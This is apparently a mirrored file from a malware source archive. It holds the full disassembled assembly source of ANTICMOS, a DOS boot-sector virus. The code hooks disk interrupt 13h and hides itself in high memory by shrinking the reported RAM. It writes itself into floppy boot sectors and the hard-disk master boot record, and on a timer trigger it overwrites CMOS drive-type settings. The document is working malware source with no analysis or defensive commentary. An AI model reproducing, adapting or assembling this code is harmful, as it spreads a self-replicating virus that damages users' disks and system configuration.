mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
304 lines
7.6 KiB
NASM
304 lines
7.6 KiB
NASM
|
|
|||
|
PAGE 59,132
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><> <20><>
|
|||
|
;<3B><> ANTICMOS <20><>
|
|||
|
;<3B><> <20><>
|
|||
|
;<3B><> Created: 26-May-95 <20><>
|
|||
|
;<3B><> Code type: zero start <20><>
|
|||
|
;<3B><> Passes: 9 Analysis Options on: H <20><>
|
|||
|
;<3B><> <20><>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
target EQU 'T3' ; Target assembler: TASM-3.1
|
|||
|
|
|||
|
.386c
|
|||
|
|
|||
|
|
|||
|
; The following equates show data references outside the range of the program.
|
|||
|
|
|||
|
DATA_1E EQU 4CH
|
|||
|
main_ram_size_ EQU 413H
|
|||
|
timer_low_ EQU 46CH
|
|||
|
DATA_3E EQU 500H
|
|||
|
DATA_4E EQU 7C00H ;*
|
|||
|
DATA_5E EQU 7C07H ;*
|
|||
|
DATA_6E EQU 7C09H ;*
|
|||
|
DATA_14E EQU 20BH ;*
|
|||
|
DATA_15E EQU 21EH ;*
|
|||
|
|
|||
|
SEG_A SEGMENT BYTE PUBLIC USE16
|
|||
|
ASSUME CS:SEG_A, DS:SEG_A
|
|||
|
|
|||
|
|
|||
|
ORG 0
|
|||
|
|
|||
|
ANTICMOS PROC FAR
|
|||
|
|
|||
|
START:
|
|||
|
; Simulation segment register change due to reset to default DS now 8EB6
|
|||
|
; Simulation segment register change due to reset to default ES now 8EB6
|
|||
|
JMP SHORT LOC_3
|
|||
|
DB 90H
|
|||
|
DATA_7 DB 4DH
|
|||
|
DB 53H, 44H, 4FH
|
|||
|
DATA_8 DW 3553H, 302EH
|
|||
|
DATA_9 DB 0
|
|||
|
DB 02H, 01H, 01H, 00H, 02H,0E0H
|
|||
|
DB 00H, 40H, 0BH,0F0H, 09H, 00H
|
|||
|
DATA_10 DB 12H
|
|||
|
DB 0, 2, 0, 0, 0
|
|||
|
LOC_3:
|
|||
|
CLI ; Disable interrupts
|
|||
|
XOR AX, AX ; Zero register
|
|||
|
MOV DS, AX
|
|||
|
; Simulation segment register change due to instruction DS now 0000
|
|||
|
MOV SS, AX
|
|||
|
MOV SP, 7C00H
|
|||
|
MOV SI, SP
|
|||
|
STI ; Enable interrupts
|
|||
|
LES AX, DWORD PTR DS:DATA_1E ; Load seg:offset ptr
|
|||
|
; Simulation segment register change due to instruction ES now 0070
|
|||
|
MOV DS:DATA_5E, AX
|
|||
|
MOV DS:DATA_6E, ES
|
|||
|
MOV AX, DS:main_ram_size_
|
|||
|
DEC AX
|
|||
|
DEC AX
|
|||
|
MOV DS:main_ram_size_, AX
|
|||
|
MOV CL, 6
|
|||
|
SHL AX, CL ; Shift w/zeros fill
|
|||
|
MOV ES, AX
|
|||
|
; Simulation segment register change due to instruction ES now 9F40
|
|||
|
MOV CX, 200H
|
|||
|
XOR DI, DI ; Zero register
|
|||
|
CLD ; Clear direction
|
|||
|
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
|
|||
|
MOV AX, 88H
|
|||
|
PUSH ES
|
|||
|
PUSH AX
|
|||
|
RETF
|
|||
|
; Simulation segment register change due to reset to default DS now 8EB6
|
|||
|
; Simulation segment register change due to reset to default ES now 8EB6
|
|||
|
;* No entry point to code
|
|||
|
PUSH DS
|
|||
|
PUSH AX
|
|||
|
TEST DL, 0F0H
|
|||
|
JNZ SHORT LOC_5 ; Jump if not zero
|
|||
|
SHR AH, 1 ; Shift w/zeros fill
|
|||
|
DEC AH
|
|||
|
JNZ SHORT LOC_5 ; Jump if not zero
|
|||
|
XOR AX, AX ; Zero register
|
|||
|
MOV DS, AX
|
|||
|
; Simulation segment register change due to instruction DS now 0000
|
|||
|
MOV AX, DS:timer_low_
|
|||
|
MOV AL, AH
|
|||
|
SUB AL, CS:DATA_7
|
|||
|
CMP AL, 2
|
|||
|
JB SHORT LOC_5 ; Jump if below
|
|||
|
MOV CS:DATA_7, AH
|
|||
|
CMP AX, 2
|
|||
|
JAE SHORT LOC_4 ; Jump if above or =
|
|||
|
CALL SUB_1
|
|||
|
LOC_4:
|
|||
|
CALL SUB_2
|
|||
|
LOC_5:
|
|||
|
; Simulation segment register change due to return from sub DS now 8EB6
|
|||
|
POP AX
|
|||
|
POP DS
|
|||
|
JMP DWORD PTR CS:DATA_8
|
|||
|
LOC_6:
|
|||
|
XOR AX, AX ; Zero register
|
|||
|
MOV ES, AX
|
|||
|
; Simulation segment register change due to instruction ES now 0000
|
|||
|
INT 13H ; Disk dl=drive a ah=func 00h
|
|||
|
; reset disk, al=return status
|
|||
|
PUSH CS
|
|||
|
LOC_7:
|
|||
|
POP DS
|
|||
|
CMP DATA_9, 0
|
|||
|
JE SHORT LOC_8 ; Jump if equal
|
|||
|
MOV SI, OFFSET DATA_13 ; (' key when ready')
|
|||
|
ADD SI, 10H
|
|||
|
CMP BYTE PTR [SI], 80H
|
|||
|
JNE LOC_7 ; Jump if not equal
|
|||
|
MOV DX, [SI]
|
|||
|
MOV CX, [SI+2]
|
|||
|
MOV BX, DATA_4E
|
|||
|
MOV AX, 201H
|
|||
|
INT 13H ; Disk dl=drive ? ah=func 02h
|
|||
|
; read sectors to memory es:bx
|
|||
|
; al=#,ch=cyl,cl=sectr,dh=head
|
|||
|
JC LOC_6 ; Jump if carry Set
|
|||
|
MOV WORD PTR CS:[148H], 7C0H
|
|||
|
JMP SHORT LOC_12
|
|||
|
DB 90H
|
|||
|
LOC_8:
|
|||
|
MOV DL, 80H
|
|||
|
CALL SUB_2
|
|||
|
MOV DI, OFFSET DATA_10
|
|||
|
MOV AX, [DI-7]
|
|||
|
MOV CX, 4
|
|||
|
SHR AX, CL ; Shift w/zeros fill
|
|||
|
MOV BP, AX
|
|||
|
MOV AX, [DI-2]
|
|||
|
SHL AX, 1 ; Shift w/zeros fill
|
|||
|
INC AX
|
|||
|
ADD BP, AX
|
|||
|
DIV BYTE PTR [DI] ; al,ah rem = ax/data
|
|||
|
MOV CL, AH
|
|||
|
INC CL
|
|||
|
XOR DX, DX ; Zero register
|
|||
|
MOV DH, AL
|
|||
|
MOV BX, DATA_3E
|
|||
|
LOC_9:
|
|||
|
MOV AX, 201H
|
|||
|
INT 13H ; Disk dl=drive a ah=func 02h
|
|||
|
; read sectors to memory es:bx
|
|||
|
; al=#,ch=cyl,cl=sectr,dh=head
|
|||
|
JC LOC_9 ; Jump if carry Set
|
|||
|
MOV AX, BP
|
|||
|
MOV SI, 34H
|
|||
|
MOV BH, 7
|
|||
|
DIV BYTE PTR [DI] ; al,ah rem = ax/data
|
|||
|
XOR CX, CX ; Zero register
|
|||
|
XCHG AH, CL
|
|||
|
SUB SI, CX
|
|||
|
DIV BYTE PTR [DI+2] ; al,ah rem = ax/data
|
|||
|
MOV DX, AX
|
|||
|
XCHG DL, CH
|
|||
|
MOV AL, [DI]
|
|||
|
SUB AL, CL
|
|||
|
INC CL
|
|||
|
LOC_10:
|
|||
|
MOV AH, 2
|
|||
|
PUSH AX
|
|||
|
INT 13H ; Disk dl=drive a ah=func 02h
|
|||
|
; read sectors to memory es:bx
|
|||
|
; al=#,ch=cyl,cl=sectr,dh=head
|
|||
|
POP AX
|
|||
|
JC LOC_10 ; Jump if carry Set
|
|||
|
MOV CL, 1
|
|||
|
ADD BH, AL
|
|||
|
ADD BH, AL
|
|||
|
MOV AX, [DI]
|
|||
|
INC DH
|
|||
|
CMP DH, [DI+2]
|
|||
|
JB SHORT LOC_11 ; Jump if below
|
|||
|
MOV DH, 0
|
|||
|
INC CH
|
|||
|
LOC_11:
|
|||
|
SUB SI, AX
|
|||
|
JNC LOC_10 ; Jump if carry=0
|
|||
|
ADD AX, SI
|
|||
|
MOV AH, 2
|
|||
|
INT 13H ; Disk dl=drive a ah=func 02h
|
|||
|
; read sectors to memory es:bx
|
|||
|
; al=#,ch=cyl,cl=sectr,dh=head
|
|||
|
MOV CH, [DI-3]
|
|||
|
MOV BX, BP
|
|||
|
MOV WORD PTR DS:[148H], 70H
|
|||
|
LOC_12:
|
|||
|
XOR AX, AX ; Zero register
|
|||
|
MOV DATA_9, AL
|
|||
|
MOV DS, AX
|
|||
|
; Simulation segment register change due to instruction DS now 0000
|
|||
|
MOV AL, 52H ; 'R'
|
|||
|
MOV DS:DATA_1E, AX
|
|||
|
MOV WORD PTR DS:DATA_1E+2, CS
|
|||
|
;* JMP FAR PTR LOC_1 ;*
|
|||
|
DB 0EAH
|
|||
|
DW 0, 7C0H ; Fixup - byte match
|
|||
|
|
|||
|
ANTICMOS ENDP
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; SUBROUTINE
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
SUB_1 PROC NEAR
|
|||
|
; Simulation segment register change due to sub entry point ES now 8EB6
|
|||
|
PUSH BX
|
|||
|
MOV AL, 10H
|
|||
|
OUT 70H, AL ; port 70H, CMOS addr,bit7=NMI
|
|||
|
; al = 10H, floppy drive type
|
|||
|
IN AL, 71H ; port 71H, CMOS data
|
|||
|
ADD AL, 20H ; ' '
|
|||
|
AND AL, 33H ; '3'
|
|||
|
MOV AH, AL
|
|||
|
MOV AL, 10H
|
|||
|
OUT 70H, AL ; port 70H, CMOS addr,bit7=NMI
|
|||
|
; al = 10H, floppy drive type
|
|||
|
MOV AL, AH
|
|||
|
OUT 71H, AL ; port 71H, CMOS data
|
|||
|
MOV AL, 12H
|
|||
|
OUT 70H, AL ; port 70H, CMOS addr,bit7=NMI
|
|||
|
; al = 12H, hard disk type
|
|||
|
MOV AL, 0
|
|||
|
OUT 71H, AL ; port 71H, CMOS data
|
|||
|
POP BX
|
|||
|
RETN
|
|||
|
SUB_1 ENDP
|
|||
|
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; SUBROUTINE
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
SUB_2 PROC NEAR
|
|||
|
PUSH BX
|
|||
|
PUSH CX
|
|||
|
PUSH DX
|
|||
|
PUSH ES
|
|||
|
PUSH SI
|
|||
|
PUSH DI
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
; Simulation segment register change due to instruction DS now 8EB6
|
|||
|
PUSH CS
|
|||
|
POP ES
|
|||
|
MOV BX, 200H
|
|||
|
MOV CX, 1
|
|||
|
XOR DH, DH ; Zero register
|
|||
|
MOV AX, 201H
|
|||
|
PUSHF ; Push flags
|
|||
|
CALL DWORD PTR DATA_8
|
|||
|
JC SHORT LOC_14 ; Jump if carry Set
|
|||
|
MOV WORD PTR [BX], 1CEBH
|
|||
|
CMP DL, 80H
|
|||
|
JNE SHORT LOC_13 ; Jump if not equal
|
|||
|
MOV DS:DATA_14E, DL
|
|||
|
LOC_13:
|
|||
|
CLD ; Clear direction
|
|||
|
MOV CX, 1A0H
|
|||
|
MOV SI, 1EH
|
|||
|
MOV DI, DATA_15E
|
|||
|
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
|
|||
|
MOV AX, 301H
|
|||
|
INC CX
|
|||
|
PUSHF ; Push flags
|
|||
|
CALL DWORD PTR DATA_8
|
|||
|
LOC_14:
|
|||
|
POP DI
|
|||
|
POP SI
|
|||
|
POP ES
|
|||
|
; Simulation segment register change due to instruction ES now 0000
|
|||
|
POP DX
|
|||
|
POP CX
|
|||
|
POP BX
|
|||
|
RETN
|
|||
|
SUB_2 ENDP
|
|||
|
|
|||
|
; Simulation segment register change due to reset to default ES now 8EB6
|
|||
|
DATA_13 DB ' key when ready', 0DH, 0AH, 'Rep'
|
|||
|
DB 'lace and press any key when read'
|
|||
|
DB 'y', 0DH, 0AH, 0
|
|||
|
DB 'IO SYSMSDOS SYS'
|
|||
|
DB 00H, 00H, 55H,0AAH
|
|||
|
|
|||
|
SEG_A ENDS
|
|||
|
|
|||
|
|
|||
|
|
|||
|
END START
|